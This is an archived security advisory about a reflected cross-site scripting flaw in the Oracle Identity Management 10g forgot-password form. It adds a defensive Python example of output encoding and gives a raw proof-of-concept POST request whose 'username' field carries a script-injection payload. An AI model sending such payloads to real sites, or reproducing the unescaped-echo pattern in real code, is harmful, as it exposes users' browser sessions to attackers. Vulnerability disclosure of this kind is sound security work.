Archive for October 4th, 2012

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability

Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the ‘username’ parameter via POST method through the ‘/usermanagement/forgotpassword/index.jsp’ script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.
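To make the defect and its fix concrete, the following is an added Python example; it is not Oracle's code and is not part of the advisory. It models a hypothetical forgot-password form that echoes the submitted ‘username’ straight back into an input attribute (the pattern behind a reflected XSS), beside a version that HTML-encodes the value before rendering, and a small classifier that tells whether a probe value came back raw or encoded, which is the check you would run to confirm a fix. The form markup and the ‘zsl…’ canary string are constructed for the illustration.

```python
import html

FORM_ACTION = "/usermanagement/forgotpassword/index.jsp"  # path from the advisory


def render_vulnerable(username: str) -> str:
    """Hypothetical vulnerable rendering: the parameter lands in the page untouched.

    A value containing a double quote and '>' closes the attribute and the tag,
    so whatever follows is parsed as new markup.
    """
    return (
        f'<form method="POST" action="{FORM_ACTION}">'
        f'<input type="text" name="username" value="{username}">'
        '<input type="submit" name="btnSubmit" value="SUBMIT"></form>'
    )


def render_fixed(username: str) -> str:
    """Same page with contextual output encoding applied.

    html.escape(..., quote=True) encodes & < > " and ', so the value can neither
    terminate the attribute nor introduce a tag.
    """
    safe = html.escape(username, quote=True)
    return (
        f'<form method="POST" action="{FORM_ACTION}">'
        f'<input type="text" name="username" value="{safe}">'
        '<input type="submit" name="btnSubmit" value="SUBMIT"></form>'
    )


# Constructed probe: benign text carrying every character that must be encoded
# in an HTML attribute context. Using a canary rather than a script payload is
# enough to verify encoding behaviour.
CANARY = 'zsl"\'<>&canary'


def reflection_state(body: str, probe: str = CANARY) -> str:
    """Classify how a probe value is reflected in a response body.

    Returns "unescaped" when the raw metacharacters are present (XSS risk),
    "escaped" when only the HTML-encoded form is present, and "absent" when
    the value is not reflected at all.
    """
    if probe in body:
        return "unescaped"
    if html.escape(probe, quote=True) in body:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"{label}: {reflection_state(renderer(CANARY))}")
```

The classifier is deliberately context-aware in one direction only: it proves that the value was encoded, not that the encoding is right for every context. A value placed inside a JavaScript block or a URL attribute needs a different encoder than `html.escape`, so each reflection point in a page should be checked against the context it lands in.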

HTTP Request Headers:
----------------------

POST /usermanagement/forgotpassword/index.jsp HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3iTaN0Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; ORA_WX_SESSION="6F35B41473025957B17F02F62855B522D4E22D7B-1#2"; Location=external; portal=9.0.3+en-us+us+AMERICA+CACA1F130AE0024EE043996B1DDC024E+4D3F611B686669BF0BEC9DC4267652AC337EA1C5259A2168CF43540DE72E3BD5EF1F589B40A6CD4E7007EB4D085EBD0681A1B2515CB22B5BED14922088923D86B742E69FDA5D716C437D416C5F5B26049DC71083712AA9EA; MODPLSQL_TRC=ReqId:11a179::PID:856d5bb0

btnSubmit=SUBMIT
username="><script>alert('XSS');</script>

HTTP Response Headers:
-----------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ORA_WX_SESSION="267FB4CAD2746E946102C01D527362A070E7D52C-1#2"; path=/
JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3iTaN0Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; path=/usermanagement; secure
Location=external;path=/;
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.2.1 (N;ecid=216172960764121113,1)
Content-Length: 3198
Date: Fri, 28 Sep 2012 21:39:00 GMT

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php